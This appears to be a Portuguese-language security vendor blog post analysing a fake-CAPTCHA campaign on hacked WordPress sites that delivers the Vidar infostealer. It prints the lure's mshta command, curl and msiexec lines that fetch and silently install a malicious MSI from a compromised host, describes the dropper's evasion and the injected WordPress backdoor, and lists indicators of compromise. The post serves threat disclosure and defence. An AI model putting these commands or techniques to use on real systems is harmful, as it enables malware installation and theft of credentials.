Sites hackeados entregam infostealer Vidar para usuários do Windows

Nos últimos anos, ClickFix e técnicas falsas de CAPTCHA se tornaram uma forma popular de os cibercriminosos distribuírem malware. Em vez de explorar uma vulnerabilidade técnica, estes ataques baseiam-se em convencer as pessoas a executarem elas próprias comandos maliciosos.

Nossos pesquisadores detectaram recentemente uma campanha que acaba entregando o infostealer Vidar, usando diversas cadeias de infecção diferentes.

Um dos métodos usados ​​nesta campanha envolve a instalação de um instalador malicioso entregue através de páginas CAPTCHA falsas hospedadas em sites WordPress comprometidos. Detectamos vários sites comprometidos envolvidos na campanha, localizados em países como Itália, França, Estados Unidos, Reino Unido e Brasil.

O que é Vidar:

Vidar é um conhecido malware ladrão de informações família projetada para coletar dados confidenciais de sistemas infectados. Normalmente tem como alvo:

• Nomes de usuário e senhas armazenados no navegador
• Informações da carteira de criptomoeda
• Cookies de sessão e tokens de autenticação
• Dados de preenchimento automático e informações de pagamento salvas
• Arquivos que podem conter dados confidenciais

Como o Vidar carrega na memória e se comunica com servidores de comando remotos, ele pode coletar e exfiltrar dados silenciosamente, sem sinais óbvios de infecção.

Fake CAPTCHA: a história sem fim

Quando um usuário visita um site comprometido, ele pode ver uma tela que imita a familiar página “Verificando que você é humano” da Cloudflare.

Esta técnica tem sido amplamente utilizada desde 2024 e evoluiu através de inúmeras variações ao longo do tempo, tanto na sua aparência visual como nos comandos maliciosos que iniciam a cadeia de infecção.

A página instrui o visitante a copiar e executar um comando malicioso que inicia a cadeia de infecção, neste caso:

mshta https://{compromised website}/challenge/cf

Mshta é um binário legítimo do Windows projetado para executar o Microsoft HTML Application (HTA). Por estar integrado ao Windows, os invasores têm abusado dele desde os primeiros dias das campanhas ClickFix.

Nesse caso, o comando inicia um script HTA simples e ofuscado, que eventualmente baixa e instala malware associado ao infostealer Vidar.

Conta-gotas MSI baseado em HTA

O script HTA é o estágio intermediário que baixa e executa um instalador MSI malicioso. Um MSI é um pacote de instalação do Windows normalmente usado para instalar software, mas os invasores frequentemente abusam dele para entregar malware.

O script executa diversas operações:

• A janela é redimensionada para 0x0 e movida para fora da tela, tornando o aplicativo invisível para o usuário.
• O script termina se o document.location.href não começa com http.
• As strings são decodificadas usando XOR e uma chave aleatória.
• Por meio de consultas WMI, o script verifica produtos antivírus instalados.
• Ele cria pastas de trabalho ocultas em uma pasta aleatória em AppDataLocal para descartar o arquivo MSI.
• No final, o script baixa o MSI malicioso de um site comprometido. O arquivo baixado deve ter mais de 100 KB para ser considerado válido. Por fim, remove o :Zone.Identifier fluxo de dados alternativo.

Neste caso, o MSI malicioso foi baixado usando o seguinte comando:

“C:WindowsSystem32curl.exe" -s -L -o “C:UsersuserAppDataLocalEdgeAgentWebCorecleankises.msi” https://{compromised-website}/474a2b77/5ef46f21e2.msi

Posteriormente, o MSI malicioso foi executado com:

"C:WindowsSystem32msiexec.exe" /i "C:UsersuserAppDataLocalEdgeAgentWebCorecleankises.msi" /qn

Carregador MSI e GoLang

O MSI define um CustomAction ConfigureNetFx e executa um carregador GoLang.

Carregadores de malware (também conhecidos como droppers ou downloaders) são ferramentas comuns no ecossistema do crime cibernético. Sua principal tarefa é comprometer furtivamente um sistema e, em seguida, entregar uma ou mais cargas adicionais de malware.

Nesta campanha, o carregador descriptografa e executa o infostealer Vidar. O executável possui nomes diferentes nas diferentes amostras MSI analisadas.

O carregador Golang decodifica um shellcode que executa diferentes verificações anti-análise, incluindo:

CheckRemoteDebuggerPresent

IsDebuggerPresent

QueryPerformanceCounter

GetTickCount

Após várias etapas intermediárias, o carregador descriptografa e carrega o infostealer Vidar diretamente na memória.

Análise de sites comprometidos

O iframe malicioso injetado nos sites comprometidos foi gerado pelos domínios cdnwoopress(.)com ou woopresscdn(.)com nos casos analisados.

O código injetado possui diversas funções, e o comando utilizado no falso ataque CAPTCHA é obtido no /api/get_payload ponto final.

Como o site malicioso estava configurado incorretamente, conseguimos visualizar o código de back-end injetado nos sites WordPress comprometidos.

O script injetado executa diversas ações:

• Cria o arquivo wp-cache-manager.php se ainda não existir, obtendo seu conteúdo do endpoint /api/plugin.
• Envia uma solicitação de pulsação a cada hora contendo o nome de domínio, URL do site, versão do WordPress e status.
• Durante o carregamento da página (template_redirect), o script filtra os visitantes com base no User-Agent e tem como alvo os visitantes da área de trabalho do Windows.
• Solicitações /api/inject?domain=domain do servidor de comando remoto. O HTML de resposta é então exibido, substituindo a página normal do WordPress.

Como se manter seguro

Ataques como esse dependem enganar as pessoas para que elas mesmas executem comandosportanto, alguns cuidados simples podem fazer uma grande diferença.

• Desacelerar. Se uma página da web solicitar que você execute comandos em seu dispositivo ou copie e cole código, faça uma pausa e pense antes de seguir as instruções. Os cibercriminosos muitas vezes criam um senso de urgência com verificações de segurança falsas, cronômetros de contagem regressiva ou avisos projetados para fazer você agir sem pensar.
• Nunca execute comandos de fontes não confiáveis. Um site legítimo nunca deve exigir que você pressione Ganhar + Rabrir terminalou cole comandos em PowerShell apenas para verificar se você é humano. Se uma página solicitar que você faça isso, trate-a como suspeita.
• Verifique as instruções de forma independente. Se um site solicitar que você execute um comando ou uma ação técnica, verifique a documentação oficial ou entre em contato com o suporte por meio de canais confiáveis ​​antes de fazer qualquer coisa.
• Tenha cuidado ao copiar e colar. Alguns ataques ocultam comandos maliciosos em texto copiado. Se você precisar executar um comando da documentação, digitá-lo manualmente pode ajudar a reduzir o risco de execução de código oculto.
• Proteja seu dispositivo. Mantenha seu sistema operacional e navegador atualizados e use software de segurança que possa bloquear sites maliciosos e detectar malware infostealer.
• Mantenha-se informado. Técnicas como páginas CAPTCHA falsas e ataques ClickFix continuam a evoluir. Saber que os invasores podem tentar induzi-lo a executar comandos pode ajudá-lo a detectar esses golpes antes que eles tenham sucesso.

Para uma dica: A extensão gratuita Malwarebytes Browser Guard pode avisá-lo se um site tentar copiar conteúdo para sua área de transferência, o que pode ajudar a prevenir esse tipo de ataque.

Indicadores de Compromisso (IOCs)

Domínios

• cdnwoopress(.)com: Infraestrutura CAPTCHA falsa
• woopresscdn(.)com: Infraestrutura CAPTCHA falsa
• walwood(.)be: Infraestrutura CAPTCHA falsa
• telegram(.)me/dikkh0k: Vidar C2
• telegram(.)me/pr55ii: Vidar C2
• steamcommunity(.)com/profiles/76561198742377525: Vidar C2
• steamcommunity(.)com/profiles/76561198735736086: Vidar C2

Não apenas informamos ameaças: nós as removemos

Os riscos de cibersegurança nunca devem ultrapassar as manchetes. Mantenha as ameaças longe dos seus dispositivos baixando o Malwarebytes hoje mesmo.